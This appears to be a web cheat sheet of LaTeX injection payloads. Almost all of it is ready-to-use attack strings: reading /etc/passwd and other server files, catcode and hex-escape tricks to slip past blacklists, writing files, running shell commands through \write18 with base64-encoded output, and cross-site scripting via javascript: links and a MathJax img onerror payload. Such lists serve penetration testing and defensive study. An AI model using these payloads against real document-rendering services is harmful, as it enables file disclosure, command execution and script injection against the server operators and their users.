Skip to content

LaTeX Injection

LaTeX Injection is a type of injection attack where malicious content is injected into LaTeX documents. LaTeX is widely used for document preparation and typesetting, particularly in academia, for producing high-quality scientific and mathematical documents. Due to its powerful scripting capabilities, LaTeX can be exploited by attackers to execute arbitrary commands if proper safeguards are not in place.

Summary

File Manipulation

Read File

Attackers can read the content of sensitive files on the server.

Read file and interpret the LaTeX code in it:

\input{/etc/passwd}
\include{somefile} # load .tex file (somefile.tex)

Read single lined file:

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Read multiple lined file:

\lstinputlisting{/etc/passwd}
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

Read text file, without interpreting the content, it will only paste raw file content:

\usepackage{verbatim}
\verbatiminput{/etc/passwd}

If injection point is past document header (\usepackage cannot be used), some control characters can be deactivated in order to use \input on file containing $, #, _, &, null bytes, ... (eg. perl scripts).

\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}

To bypass a blacklist try to replace one character with it's unicode hex value. - ^^41 represents a capital A - ^^7e represents a tilde (~) note that the ā€˜eā€™ must be lower case

\lstin^^70utlisting{/etc/passwd}

Write File

Write single lined file:

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile

Command Execution

The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.

\immediate\write18{id > output}
\input{output}

If you get any LaTex error, consider using base64 to get the result without bad characters (or use \verbatiminput):

\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base64
\input{|"/bin/hostname"}

Cross Site Scripting

From @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

in mathjax

\unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}

Labs

References